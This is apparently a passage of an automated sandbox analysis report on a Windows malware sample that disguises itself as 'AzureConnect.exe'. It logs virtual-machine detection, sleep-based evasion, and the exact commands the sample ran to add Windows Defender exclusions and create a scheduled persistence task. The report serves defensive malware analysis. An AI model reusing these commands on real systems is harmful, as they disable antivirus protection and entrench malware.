            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1B200000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMemory allocated: A80000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMemory allocated: 1A5A0000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMemory allocated: F60000 memory reserve | memory write watch
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeMemory allocated: 1AA80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2058Jump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7794Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6895Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2895Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8078Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1452Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7694Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2018Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8303Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1379Jump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6224Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep count: 8078 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 1452 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964Thread sleep count: 7694 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4524Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616Thread sleep count: 2018 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep count: 8303 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep count: 1379 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe TID: 2508Thread sleep time: -922337203685477s >= -30000s
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe TID: 1900Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeThread delayed: delay time: 922337203685477
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeThread delayed: delay time: 922337203685477
            Source: file.exe, 00000000.00000002.3313459605.000000001C1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrkfl%SystemRoot%\system32\mswsock.dllng>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess token adjusted: Debug
            Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
